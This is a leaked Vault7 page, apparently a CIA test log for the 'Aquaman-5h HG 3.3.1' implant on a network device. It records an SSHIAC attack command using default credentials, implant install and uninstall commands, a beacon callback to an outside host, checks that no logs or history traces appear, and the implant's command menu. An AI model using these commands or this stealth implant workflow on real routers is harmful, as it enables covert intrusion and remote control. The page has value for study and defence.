Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #71467
Aquaman-5h HG 3.3.1 - Full Test
Aquaman-5h HG 3.3.1 - Full Test
Xetrron delivered Aquaman-5h HG 3.3.1 with a fix to EAREnterprise Archive 5244 (snooping causing err-disable). Plan is to perform a full test of this Aquaman delivery.
Testing Summary
CURRENT STATUS - CPU seems to hit a max exery minute of 11% or so without HG installed, then install HG and it drops to 7% due to CPU scaling? Left off in the middle of testing how high CPU goes for the ten minutes after an HG uninstall. I had seen a peak of about 25% the first time through, wanted to verify this.
When I left for the day, HG is installed. Next step - Just need to do a device uninstall_hg -mp -f and monitor how high the CPU goes afterwards to complete this test.
Progress/Notes
4/16/15
- Collect Baseline information for use in later comparisons
- Deleted all previous crashinfo files from flash card of Target Device
- Reloaded Target Device
- Collected baseline files with output of show tech, dir all, show mem and CPU, show log
- Used memory - 26975916 (b)
- CPU - 5%/0%; one minute: 6%; five minutes: 6%
- Ran RANCID - collected version 1.6
- Install/Uninstall HG without leave behind
- SSHIAC attack - ./sshiac --ip 172.31.255.14:22 --l cisco:cisco password
- LG EC-125 DHDiffie-Hellman encryption EC-60 EC-159 M - these codes are acceptable per readme
- Observed CPU during attack: 46% highest spike
- Used memory after SSHIAC attack - 26966496 (b)
- Install HG
- Left the interpacket delay at 1s (not directed to change it in readme, and I'm following the readme)
- hg_start - result success - Result: 0x00000001
- Observed CPU during install: 19% highest CPU spike
- Used memory after HG install - 29893996 (b)
- no commands from attack or install observed in show history
- Establish HG Comms
- Edited aquaman-5h.txt file - replaced <INT> with eth0 and <IP TO TRIGGER> with 192.168.21.10
- Ran prep-ct.sh
- Established CTCounter Terrorism session - Observed 19% spike during SSLSecure Socket Layer handshake
- beacon call_base_back https 172.20.12.22 443
- Used memory after CTCounter Terrorism session - 29863488 (b)
- Hit tab twice:
[192.168.21.10]>
aliases ca collect device encryption https mitm packet redir tun
beachhead capability communication dns file ilm mode process scramble verbosity
beacon cmd compression ebroker filesystem memory module quit socket web - HG Base version 3.3.1
- Uninstall HG
- device uninstall_hg -mp -f
- no syslog messages generated
- Used memory after uninstall 26954800 (b)
- Observed CPU during uninstall - 12%
- Output from show proc cpu history - shows slightly lower peak CPU for one minute with HG installed (7-8% with HG vs 9-11% without HG)
After uninstall - CPU utilization for five seconds: 5%/0%; one minute: 6%; five minutes: 6%
- SSHIAC attack - ./sshiac --ip 172.31.255.14:22 --l cisco:cisco password
- Install/Uninstall HG with leave behind
- Reloaded to start with a clean Target Device
- SSHIAC attacked successfully
- Installed hg with leave behind
- No syslogs, cpu and mem as expected, nothing alerting in show history
- Establish HG comms - success, no alerting events
- Uninstall HG
- device uninstall_hg -f
- After uninstall, was able to successfully communicate with remote - broad
- Reinstall HG
- hg_start_leave_behind - success
- Established comms
- device uninstall_hg -mp -f
- Command and Control